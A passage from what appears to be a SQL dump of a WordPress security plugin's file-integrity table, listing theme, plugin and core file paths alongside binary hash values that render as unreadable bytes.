R��rP��','',0,'?'),('j����5F+���o','wp-includes/images/crystal/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),('j��}R���`�6��','wp-content/themes/vega/assets/img/ico_arrow_lr_black.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@�d�q%�x؛�w','�h@1�/�\r�\\\"	�\0���_�!}��K��<�','',0,'?'),('j�|.��J^��R�Rn','wp-content/themes/alpha-store/lib/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�Z����i/�g��','�n]�Eŭ������f\Z��!�@D�C��7$�M','',0,'?'),('j�a$�	?h��`�R�','wp-content/plugins/wordfence/css/wf-adminbar.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0����\"CϷ�Tb�','h�S䘷*g�5��)!���}�Bl�N�E�','',0,'?'),('j��4-�O Մ��rL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$1�D�\'w��m���','E&&\n��a���~�b+\Z���)j��M�p��M�','',0,'?'),('j�gs�66�$��8*�E�','wp-includes/class-wp-dependency.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NV}��b.\'�5m','�[�4M�,�4�ܓ�x�wBB̕=Bg��}I�l�','',0,'?'),('j›��(˥e_�(','wp-content/themes/sg-window/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�NK!�KE~�1	R-F','�Cم�_f;w�%H=�2—�&*>h�MgK�����','',0,'?'),('jث��b?\0�)\\�ѪC','wp-content/themes/skt-construction-lite/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�MFٳ���f�7u','�y�dL�����kA�|�h?��� מ\n���','',0,'?'),('j�w��%>���=8�\njG','wp-content/plugins/unyson/framework/core/Fw.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'���[k���B�','�zE\"�Z��-���@�#�wj��I\0�`���D�\'','',0,'?'),('j��n�oY���jĴ,�','wp-content/plugins/contact-form-7/languages/contact-form-7-bs_BA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u���KFZ�','3�dS/>� �`@3��v�����TD5:r6�','',0,'?'),('j�NK�m_�>���a��','wp-content/themes/hueman/languages/de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��iH9�]�Q�dLt','g]�B�����rC~�w�)y�^�I(��G��','',0,'?'),('k	���<�(G�w���','wp-content/plugins/contact-form-7/modules/number.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��AQ��`7�t�@��}M','a��\r4��p��d±.��)IO�Ud�K��X','',0,'?'),('k���$6O��-N�x�','wp-includes/js/tinymce/plugins/charmap/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=B�쟄��P\rL��','•�x[�G��-�90b.z�G��az�>�r','',0,'?'),('k%�\r0̯�IN6�D\'�y','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�+�ک�d�ݬ@��','w�bj�Y����S����tc��� ��I��dQ','',0,'?'),('k1<�S��H@}e>�?�','wp-content/themes/illdy/layout/fonts/font-awesome/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��je�X���r','��l�v[�%AhZ��R�I�l(,A�k��17�CZh','',0,'?'),('k6���*���H�	�u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�}��I�F�ty�','p�\r�G$��M��,�F7\rC�\\^��,�[tdΎ','',0,'?'),('k>�d	\\��\0���','wp-content/themes/wen-business/assets/js/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D\\ًwR�$����','^\n?�\Z��Q�\0]�ڦ_�\'�Pr)�)~�t���','',0,'?'),('kGKb	|�*Ohj�9[�','wp-content/themes/supernews/assets/js/supernews-customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0&�[��!�8��5',']��$��[�����a��Κ�!)���g�','',0,'?'),('kM������̙Ysp','wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�? fCv	\Z�X�H','�wv�\0��i�š,5<�3����/MVb�','',0,'?'),('kN��(l�Zf��E\"Lm�','wp-content/plugins/contact-form-7/wp-contact-form-7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���uά��03^.','�Ӕ�!��I3��}ވ��>kū����','',0,'?'),('k^�?��S��/k�\0�ߪ','wp-content/themes/skt-construction-lite/images/hr_double.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`e�7���=��q�i','$��Ѝ��o���}�?�3\Z�+_�)��d�','',0,'?'),('km�|��Kma0�\"*�k','wp-admin/js/tags-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�ͨ�p���d����','�r0�\"��l\n�E�ݴ�*�7��vL�{d','',0,'?'),('k}:����VN����G','wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>P��H�e6�[GF�5�','��q!�홐��%ހP٧��H��r�.�L��~','',0,'?'),('k��r�5D0C�g�.�?','wp-content/themes/point/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�My�%��6','�e�Qк�W���\"4���۰\'�~L��^�\'','',0,'?'),('k��1���/�͓ݐ%=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dq�d6�+\"��U���','�I����s;֮����i����k���E�@�)','',0,'?'),('k���H��8�oc���','wp-content/themes/vega/assets/js/jquery.smartmenus.bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z��:�.��X�','М܁��_�X�5H\Z$���K�@S2N�7','',0,'?'),('k�960-����@q��J�','wp-content/themes/nirvana/fonts/sourcesanspro-semibold-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z,��^�&f_֥','�{��7YhN��98��š�������','',0,'?'),('k���}t�z\0y\\U�','wp-content/themes/nirvana/fonts/yanonekaffeesatz-light-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r\n0k5I����n','�����w��?��klx[Wዜ�UFk�?_','',0,'?'),('k�C���w*�f��J+�','wp-content/themes/panoramic/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ����eҘ��ӑ��T�','��AY%�-;�V�-z���&\\�mMU��|\r��','',0,'?'),('k�q��?�J�n���E','wp-content/themes/hueman/languages/de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V5�;�!��r1C|K ','$��\"ơFp`\Z4���P��jv��F�n��X>','',0,'?'),('k�qQ�٩,Ә�����+','wp-content/themes/hueman/functions/dynamic-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�g�J����料|�','��6��1� �j�=dt��4�O�瑽uP#05o','',0,'?'),('k�x�r�,j��i���(','wp-content/plugins/wordpress-seo/admin/class-asset.php',0,'��J\rAP��d�Y���I','��J\rAP��d�Y���I','�!N����_iS��Q\ZSĽ��۞PZ�U��','',0,'?'),('k��B˞�b=y��','wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ig�$o���L�Ȧ�}','�\\ȸդ%�ۈo���N�T��p/D�L:fi\\�8','',0,'?'),('k“��U/�^���� ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��֟0}_���','�O�+�WE��(\Zvl�%`���¢�x�6��n� ','',0,'?'),('k�@ϛw)���p�6�','wp-content/themes/point/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m��]�\n�gGp�N','g�#ZGqüW�k*B���\'�B�T��ޣa��','',0,'?'),('k��|��`v�!��}�','wp-content/themes/accelerate/css/admin/welcome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��V�,�����5�','���1yՀ�dK4>�Z*�~[R�&w��T','',0,'?'),('k�\'\n+&=��n`�3�','wp-includes/js/dist/dom-ready.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4;��h� �����','�_ы��î��}���|�\Zmԡn�wB>0','',0,'?'),('k�L?]R\"�3�d��>','wp-content/themes/alpha-store/languages/alpha-store.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wϜ[�\0ʥOhO� �ձ','k`\'3�oxp�W|#��#����������3>�','',0,'?'),('k�1�~�R�xOj���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php',0,'q���\nv��W\0��� �','q���\nv��W\0��� �','#9�@/�-�b�X�H����p��0de{�L�6f','',0,'?'),('k�Hy�^�,�@��zM','wp-content/themes/sg-window/sidebar-top.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɺdvE\'Gn��a��@','ML�q�ȅQ���\"�e!F�^��T#���]-','',0,'?'),('l7�N��<߳VʦZ�','wp-content/themes/twentytwentyone/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$\Z[�%.J��̀q�','=qOv�HbO U�;��\nA8����r����ʋ','',0,'?'),('l�V0�8�L*�­��','wp-content/themes/fabulous-fluid/js/jcf.button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ep��iB%v�.l�ז','|�4	u�ꌽ��λF�c�d���A�u�C�_','',0,'?'),('lDW�qa�+���V�','wp-content/themes/sg-window/img/icons/wordpress.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*��v�(:���','hz���(qS)p@��[w���n�l‡��B','',0,'?'),('l =ܖ,\0�9}��`���','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ip.apnic.php',0,'�!v$.&\r��`�V�\"��','�!v$.&\r��`�V�\"��','Zc�G�����`T�\r\nΒWA*��&�F(u��','',0,'?'),('l*޻Q7��A�Ե�','wp-content/plugins/contact-form-7/languages/contact-form-7-he_IL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��I�9Yu5�b��=','����w+�\0��T��\0�&S������ő	W','',0,'?'),('l/\n�Ԁ�W�ͱ-c�','wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d���j�F����3','5���s�	��O>���{��ĩ�2�!�.�1��','',0,'?'),('l5Y�`*�њ�?�ް��','wp-content/themes/sg-window/publication/index.php',0,'g� A�^k6зخ\'1�','g� A�^k6зخ\'1�','#��ͣg����Q*��PQK��$��v�xM��','',0,'?'),('l7�Ǒ\'Ӈ�e:����','wp-content/themes/aqueduct/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r��6�����>=�','��,� %�jE8�ѤAo1�nP��v�0~�<]\n��','',0,'?'),('l9��=��h�,>���&','wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0I����H���pz��','\n�ö\'������%���?��Zyޘ{���','',0,'?'),('lI\r_�/���,:j*:T','wp-content/themes/sg-window/customize-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�TS��X��I��E','�-���$1B܅���)��dɿΟ,�\'V�r\n�','',0,'?'),('lM�]iuz��c�~��','wp-content/themes/precious-lite/images/slides/slider1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"\"�W���1E�Pn','��;1G��ڧ��`{�/yk�M�B�uI���~Y�','',0,'?'),('lTǁ5�r.[S�O�h','wp-content/themes/wen-business/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(q�!��	�p��E��љ','A��\0���(�����bн�O-z)Z��d�8`��','',0,'?'),('lU��zx��v�P�','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/unyson-font-icon/fonts/icomoon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!+��#��Ĵ����','y-Df��x�G����hl���\'�\r�b�ht���','',0,'?'),('lZ�q�#eS%s��7Y�','wp-includes/js/dist/notices.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"W���?����ǭ�',' ����J�ٷ������#c�^6��ҦC���','',0,'?'),('l`�c��A�$W���','wp-content/plugins/unyson/framework/includes/option-types/icon-v2/includes/class-fw-icon-v2-favorites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J�C�>�/hMM!e','���Ѧ���#i�v�\"�R����1�͋���`','',0,'?'),('lhs�o$��!�e37','wp-content/plugins/spam-captcha/core/img/flags_sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@}A|<<�Q��#=��','�uٻ_�p�gQ6�\\G��F�p	��� �7��Y','',0,'?'),('l��b�Ɍ�r^z�#','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xݮ�<�N\0.�ܰ��x','#C����?�=�Z�\\N-ev�\Z��w�GU!J��\Z','',0,'?'),('l��o?\'��U�u���','wp-content/plugins/spam-captcha/lang/spam_captcha-zh_TW.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��6�>��Y�4�','^탒%Hgl���ƺ�7)AI[��1��������','',0,'?'),('l�\Z��X\0R��÷6�','wp-content/themes/sg-window/inc/js/meta-box-image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i g4Xo������d','S�*���bZ�:9�U�����i�G��*T�','',0,'?'),('l�Y��Ӽ�\0tH�!�r','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-seo.php',0,'e��Ћ�f?��2���','e��Ћ�f?��2���','U�m�G�Q�L)�=�/Z��T�1�\']`.fV','',0,'?'),('l���W��el���5!�','wp-content/plugins/unyson/framework/extensions/breadcrumbs/manifest.php',0,'�x\Z8���;H�>ߋ(','�x\Z8���;H�>ߋ(','\"�)W��,\n���9J��Y���nc�Da+�A��','',0,'?'),('l����G�RsiDg|a�','wp-content/themes/alpha-store/lib/cmb_extension/js/select2/select2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�v� SW�aZ�I\0','���\Z��S��=�O��nSm�o ��}','',0,'?'),('l��=��nԭ��;֏,','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-zip.php',0,'v#��ᷳ�_�g����','v#��ᷳ�_�g����','y�}.1����\\)�U$���M�F�|��7C�','',0,'?'),('l�(E���t�m:8�I�','wp-content/themes/sg-window/inc/customize-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]��}�BWo,�','���@�wm��2�O��ךoK�%�R!�\"��|�','',0,'?'),('l��3s�=���T(\n��','wp-content/themes/supernews/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>y�p~��:4L�;���','�O���i�6���i��:@��Н(B^���','',0,'?'),('mD��T�ms���A�}','wp-includes/certificates/ca-bundle.crt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M��T�[чB��','�����aP����P\0�v?6,�̟An���','',0,'?'),('mc���е@�H��z�','wp-content/plugins/unyson/framework/includes/option-types/slider/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�\n��S(���6','�}��K��B�\0�K��Ғ;T� ��b�c��','',0,'?'),('m/XV�����','wp-content/themes/verbosa/includes/hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K~k�E���ʫ','�eN�?���T��xj�V�\r\0r0�L��F�bּ','',0,'?'),('mA�p��	1��G�U/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�׋�Po�v��`�','�Zu�E-�-߈��������S�C��di5$r','',0,'?'),('mA�\"��T!p0��','wp-content/plugins/unyson/framework/extensions/breadcrumbs/views/breadcrumbs.php',0,'\'#��<�U�[\0U�Wv��','\'#��<�U�[\0U�Wv��',']����̱�	�[�4qP�J)@̷t�Q\n���','',0,'?'),('mA��Y����Rb|�S�','wp-includes/ms-default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�%�M�A�b���Y�','_%������ ��+�g��`���}<���','',0,'?'),('mE{�I�P�ӧm�X2]\"','wp-content/themes/the-minimal/languages/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V%���W\n$`\"��/c�','��G��ܷ�B�^��#0�Z�8�;���Q���','',0,'?'),('mE���\\�)��o�','wp-includes/js/jquery/ui/spinner.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�������<8z�+','�5��bW���O��h���_�_��� I��','',0,'?'),('mY����}ɽ��?','wp-includes/js/jquery/jquery.ui.touch-punch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),('mi^�BACF��)�','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/css/updater.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=*�&뇷j*f/6�','�����%ke���%�N5;$�Q6�w/Uă�','',0,'?'),('mo-���K\n�򠻎<','wp-content/themes/the-minimal/images/prev2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"erZ��?@���KA','ڥY��6�E�H����j�J�7��F�','',0,'?'),('mx�<���H���)��','wp-content/plugins/wordpress-seo/admin/views/tabs/sitemaps/user-sitemap.php',0,'�+�UݦA��d�t','�+�UݦA��d�t','������A��4u[�U`�\rϪ�6��!%�Ȍ�','',0,'?'),('m��-\Zm1����w��','wp-includes/js/jquery/ui/sortable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��:�7)�r�ӈ�k',')��jjc�D�߰�%^B���� �&�ٶ�Ƀ�','',0,'?'),('m�y�z̗�܊�W�M','wp-content/plugins/all-in-one-wp-security-and-firewall/css/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('m���Ƞ��}:/�Y�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/da.js',0,'đ�Y���s�~��/B�','đ�Y���s�~��/B�','�$g���̎�ˌD�S&uf��٢z1`	�y','',0,'?'),('m�$8u��c����Wi','wp-content/themes/nirvana/fonts/sourcesanspro-extralight-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�M�R�e�W�S�p��','����Z�\0�+g~�e�w����2[�vv팔7?','',0,'?'),('m�,��hd�͉*��3','wp-content/plugins/wordpress-seo/admin/views/tabs/social/accounts.php',0,'����\"�0vΈ�7X%','����\"�0vΈ�7X%','-��i�NIF�],ǰT=\'�!k�Ynڭе�','',0,'?'),('m��㺙]�&�F���-','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/class-fw-ext-backups-task-type-image-sizes-remove.php',0,'���<�H��Vc���','���<�H��Vc���','��b_6�N��4ĭ� �����fݥ���Q','',0,'?'),('m�`��4���m��','wp-content/themes/nirvana/admin/images/schemes/Nirvana Default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','厠D���*.4��~�)','�R�G�j��Κi_0:7?��yY�0�*�+o3�','',0,'?'),('m�x�X�Yv�%o�]2','wp-content/themes/clean-magazine/js/clean-magazine-customizer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ݲ���[�G�Q��','�b�T�}��ڷȓR��\Z+�Z>�}s�suhw','',0,'?'),('m�8�w1��Up9��u','wp-content/themes/relia/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iH7q�/C�3av��9','ۓ&`����D&��M���Ut\"a	��^\n�','',0,'?'),('m�oIwҴ	4!]\'','wp-content/themes/tortuga/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�T�o3Ax���n�','��/�#T�a��I�\Z���n*��s4�H\\L�H�=','',0,'?'),('m��E3�:�/��<rO�','wp-content/plugins/spam-captcha/core/lang/SL_framework-el_GR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+���xП�D�','��vŲNE#�H�b�t�%��<�\n��v�T�]','',0,'?'),('n\0����G��߆�o�','wp-content/themes/clean-magazine/js/source/jquery.cycle/jquery.cycle2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','swu<�H�2����\r��','3�Чӫ��qY����!��ڰv\\w�=�� ','',0,'?'),('nQ��ʒ\'�k��\"%�','wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=�	���Tc�vL\n*Ȱ','',0,'?'),('n\n�M�\0<;�l�s�q�','wp-content/plugins/contact-form-7/languages/contact-form-7-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','҈�4���~����','B�C:Ƥ,�N��m��<}H\\\Z���l�T���','',0,'?'),('n]�j7<3ISsQ�','wp-admin/images/post-formats32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t.E���5G�N\Z�v','(Z�,���Im�Y,·�ԗ��tG��������a','',0,'?'),('n[	X���}�0�','wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%ؘ5��a�O�_��','�3½}�߈�6��-������x%�uv�','',0,'?'),('n%[�[Of�~��>f','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.domainpeople.php',0,'~���^	h4묽<�:jX','~���^	h4묽<�:jX','\"�����_=��=\r�9���A:9%NG��Q��� �','',0,'?'),('n:�8�a�k�����-','wp-content/themes/nirvana/includes/custom-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�F�̐�=�\nr�','��n\"b����NB<�P��<0�l���ȑ�Vj','',0,'?'),('n�߻���Z_�� �','wp-content/themes/fluida/resources/fonts/socials.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8���sK�X4bde��$','� �7�,�%������K�����?M\"P��5�','',0,'?'),('n iW%����W��݊','wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/img/transparent_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0f�+�#K�MC8���','�}��Pt��\'�\0x�`��+�H���m�����IS','',0,'?'),('n#�t=�\'����b]{�','wp-includes/js/tinymce/themes/modern/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���E��|�h(Zf�','ӣ	}�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),('n$.-$���2��F�9','wp-content/themes/vega/assets/fonts/glyphicons-halflings-regular.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v���tf�e�9� F�','t��a±�\0ӫ�I�D�v2u��\0���+�T�','',0,'?'),('n+v%_�9�Ε;إ�e','wp-content/themes/nirvana/admin/images/schemes/Fresh Fresca.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7y(���c�w%��f','�DDךUl�F\'7>}�ۼ�Qd��\rD+�_�bW�Z','',0,'?'),('n=�s�\r{�A���ٰ�','wp-content/themes/panoramic/library/template-parts/header-centered.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$s{Y�Ԡ��_ܪ�o','$N�_i������gnΡ��י���f\'\rb�','',0,'?'),('nAj+�u��VG7d','wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AT)T	��<˹o��','����}��\Z�dv�C��lC\\�{�{�4&[�','',0,'?'),('nMG�ZBf\"$�Q�%�}','wp-content/themes/nirvana/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nv������ ��','�F�u�}q*����(�mtS�[���b�O��P)�2','',0,'?'),('nSO=�\n9�ȗc��SA','wp-content/themes/sg-window/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�]y`��.{�#��','6��E�ȯX��j<~XS�d��/����','',0,'?'),('nW�|C��E���(	','wp-content/themes/tortuga/css/genericons/Genericons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�ө\n�/;]s>','4�+_�[�������qpv,��{�l������','',0,'?'),('nZ/1T:{&^�/n���','wp-admin/js/media-gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c(�&ѿ�(-����','/q�I���4�o�\'��=�au0=�l>�=&��+��','',0,'?'),('nZP�vx�۽�=o','wp-content/themes/lightly/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T\0�����?C3','�-�j7l���X��j�S���[f�k`8J�','',0,'?'),('nt�E�aG�X�h�6\"','wp-content/plugins/spam-captcha/core/lang/SL_framework-hu_HU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Ztf1��$��Z\n���','P�X	B`wJ���>�F�@=]�1\Z���5�[	���','',0,'?'),('nL�\0O�ǽq����g','wp-content/plugins/spam-captcha/core/lang/SL_framework-id_ID.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','16Ձ�F��P�`','f�|b=��K���3粑9�ES]y\"�ţ{�','',0,'?'),('n�|�����q$�:�D�','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-webdav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*j�o��\\d̸�����','W�Q�d����� ��A�$Mf��w�;KNb','',0,'?'),('n����l2��O�','wp-content/themes/fluida/resources/images/headers/underwater.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X鬞�WV]��K6�','!�9i\r�$I\n���P�UW&s0ytN��)q��','',0,'?'),('n��^G��d��˶ª�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/et.js',0,'��U78磝Ҷ\"�rQ�','��U78磝Ҷ\"�rQ�','xk\\��M�\ni\rؐ�.����Vk>lP�','',0,'?'),('n����@��A��F�','wp-admin/network/sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pN�ۚ��X��7��','�Ob~N\\Tp\0z7_Ŵ��\0�>a��\rNm�	','',0,'?'),('n�<��\"h�GVM�f','wp-content/plugins/all-in-one-wp-migration/lib/view/main/wordpress-htaccess-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F6�t��Yf\r��A�c','\\9a���K�9LKvKer״��fCv�4�Ż�v�j','',0,'?'),('n��g�N�_)�K��<X�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/cs.js',0,'\'�&Ba_�ӷXU���','\'�&Ba_�ӷXU���','�{?ԋ;(0ЈS���_,�~tQ��7��UM�:�','',0,'?'),('n����-:8x۾�O�R','wp-content/plugins/spam-captcha/core/img/arrow_up.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ȭ�u���LT���','8�d����^�Z	�ŤB9��m�v���j���','',0,'?'),('n���熰�ebWO�u','wp-content/plugins/wordfence/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('nŢ�)�c���q^\"','wp-includes/Requests/Exception/HTTP/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�RaßC�`\0�UT�','�}��=3x�A9����l��p\0�ư�9e.O','',0,'?'),('n�e�����;����<','wp-content/themes/twentytwentyone/assets/sass/style-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�